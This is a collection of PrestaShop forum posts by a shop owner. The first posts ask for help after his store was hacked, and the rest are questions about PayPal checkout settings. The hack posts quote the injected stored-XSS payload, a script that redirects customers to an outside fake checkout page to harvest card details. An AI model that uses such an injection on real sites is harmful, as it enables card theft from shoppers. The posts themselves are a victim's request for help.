My site has now been hacked 2 times within a week, what they are doing is injecting the script into one of the database table. Unknown"><script>document.location="http://www.connexcargo.com/securePayment"</script> This redirects the customer to a fake checkout page when they click the checkout button. The first time they did this I updated all the modules that said there were updates available and changed the ftp details and login passwords. I need a prestashop professional to find out where the vulnerability is and fix it, Ii understand it could be a module or even the theme. The theme I have installed is NaturaShop version 3.5.3 My prestashop version is 1.6.0.9 If someone with experence in this could help, please get in touch as soon as possible. Regards John

Urgent: Checkout redirects to fake checkout
johnmoore84 replied to johnmoore84's topic in Core developers
Hi Ambassadors, thank you for the link , will read through this now. The code you provided above, is there a certain file they would need to inject the code. My hosting company are looking into this as we speek. Thanks John -
Hi, not sure im posting this in the correct place. My site has been hacked, what happens is, when the customer clicks the 'checkout button' they are redirected to a fake site trying to get their card details. I have took my site down at the moment. Also on the back end of the website, when i click the 'customers' tab it also redirects to the same fake checkout page. I think that when you click checkout it goes to /quick-order then redirects very quickly to the fake site. I am unable to locate the code I assume they have added to redirect it. Any ideas where I need to look and what I am besting now. Thank you Regards John

Are you using paypal pro, I found sometimes when customers pay by card this happens. In paypal under profile-security and risk setting there is an option to tick Block accidental payments. Hope this helps.

Hello I had the module working fine on my site which is a uk site using the iframe setting. I have since change to a paid paypal module by prestochango as google conversion tracking did not work, still got some small problems tracking sales though. Its best to remember the free modules are that free so it may be best to go for paid modules some times.

Hello when customers pay with the paypal the order goes through fine and then the customer reaches a page that says return to merchant which the customers has to click to be sent back to the order confirmation page on prestashop. This is fine but it does cause one problem. I find that the customer does not select to return to website by clicking return to merchant. I want to set the automatic return url in paypal so that it automatically returns the customer to the order confirmation page on prestashop. Does anyone no what url I need need to insert into paypal to redirect the customer automatically to order confirmation page on my website after they pay with paypal. I tried https://www.mywebsite.co.uk/index.php?controller=order-confirmation I thought this had worked but it seems to transfer the customer page to a page where you select to pay with paypal again on my website and not the order confirmation page. I need to make sure they direct to order confirmation so google analytics's tracks conversions. Any help much appreciated. John

Hi I have a problem with Paypal displaying the delivery address during checkout on the paypal screen where customers enter there card details. The problem is that if a customer decides to change the delivery address when making payment we would not no as the address does not update on prestashop. I have contacted paypal to try and resolve this and tried a few suggestions in the setting of paypal to prevent it showing the delivery address. They have now said as shown below, Not sure where to add this code, would anyone know where the code should be added. Im using the PayPal v3.7.2 - by PrestaShop The another solution would be to add this line of code into your shopping cart <input type="hidden" name="showShippingAddress" value="false"> which would remove Delivery address option at the checkout. Any help with this is much appropriated Thanks John

Stop Paypal payment page showing delivery address
johnmoore84 replied to johnmoore84's topic in PayPal
Hi Michael hope your well, Usually I use the iFrame option to process the payment with paypal within my website but had problems with eCommerce NOT tracking in google analytics's as it was only tracking orders who logged into and paid with paypal and NOT customers who entered card details to pay. With this option its just ask for the card details and processes the order. When I changed it to 'full page redirect' it tracked all orders which is excellent but I noticed they could change the delivery address which could cause problems if they did as we would not know. I know there is an option in paypal to tick tunder profile / website payment setting - setting / customer information as shown below. I though maybe the paypal module some how override these setting and was in affect ticking the dispatch / delivery information box, Any thoughts on this, if not will email paypal and ask the question. To process payments, we collect credit card numbers and expiry dates from your customers. You can select additional information to collect and display on the payment page. You can also collect information from your own website and send it to us in your web payment request. Select the information you want to collect from customers. Hello, I have Prestashop 1.6.0.9 installed and have PayPal v3.7.2 - by PrestaShop I an using paypal website payments pro and under configuration option have selected as a full page redirect and payment type direct sales. The module works fine now but my issue is when the customers completes checkout through prestashop and enters there invoice address and delivery address then selects to pay by paypal. On the paypal payment page when you select 'pay with my debit or credit card' its gives you the option to choose your card type and enter you card details. The problem is it also displays the delivery address that can be changed on the paypal payment page. My issue is that if someone changes the delivery address at the last minutes when making payment the address is not changed on prestashop. Is there a way to either stop the delivery address showing or make it so they cannot edit the delivery address shown on paypal when making payment. Hope someone can help, I have attached a screen shot of the paypal payment page which makes it more clear.paypal screen.doc Thanks John
